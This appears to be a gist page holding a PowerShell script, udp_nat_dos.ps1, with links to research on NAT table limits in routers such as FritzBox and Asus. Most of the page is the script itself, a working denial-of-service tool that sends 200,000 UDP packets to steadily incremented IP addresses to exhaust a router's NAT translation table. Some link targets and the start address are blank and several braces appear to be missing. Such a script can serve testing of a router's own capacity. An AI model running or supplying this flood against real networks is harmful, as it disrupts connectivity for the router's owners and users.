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Last active April 2, 2023 12:44
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Sends many UDP packets to different target IPs. Tries to overhelm the NAT translation tables of NAT routers
# Sends many UDP packets to different target IPs. Tries to overhelm the NAT translation tables of
# NAT routers
# Example calls:
# Linux with installed Powershell: pwsh udp_nat_dos.ps1
# Windows .\udp_nat_dos.ps1
# Code adapted from
# Original source seems to be:
# Literature:
# - [NAT Denial of Service: An Analysis of Translation Table Behavior on Multiple Platforms, Nathan Winemiller, 2012](
# - [Discussion on Stack Exchange regarding Asus router](
# - [Discussion on serverfault regarding FritzBox](
# - [Wie viele NAT-Sessions verträgt mein Router?]( - "Aktuelle DSL-Router erlauben oft einige Tausend Verbindungen. Die AVM Fritzbox 7390 schaffte in unseren Tests etwa 7.000 Sessions."
param (
# port to send to
[ValidateRange(1, 65535)]
[int]$remoteudpport = 53,
# SourcePort, 0 uses an available port
[ValidateRange(0, 65535)]
[int]$sourceudpport = 0,
[string]$buffer = "x",
# packetcount
[int]$packetcount = 200000
$ErrorActionPreference = "Stop"
[DateTime]$start = [Datetime]::Now
[int]$count = 0
try {
# start ip
[IPAddress]$remoteip = [IPAddress] ""
$udpClient = new-Object system.Net.Sockets.Udpclient($sourceudpport)
$byteBuffer = [System.Text.Encoding]::ASCII.GetBytes($buffer)
$byteBufLen = $byteBuffer.length
Write-Host "Lets go..."
for ($i = 0; $i -lt $packetcount; $i++) {
# sent packet
$sentbytes = $udpClient.Send($byteBuffer, $byteBufLen, $remoteip, $remoteudpport)
if ($sentbytes -ne $byteBufLen) {
write-host "Error: Send Bytes Mismatch"
# increase packet counter
# change ip address by adding 1
$remoteip = New-Object System.Net.IPAddress($remoteip.Address + 1)
catch {
write-host "Error:" $error
finally {
[DateTime]$end = [Datetime]::Now
$duration = $end - $start
write-host "count:" $count
write-host "Duration:" $duration "`nPackets per second:" ( $count / $duration * 10000000 )
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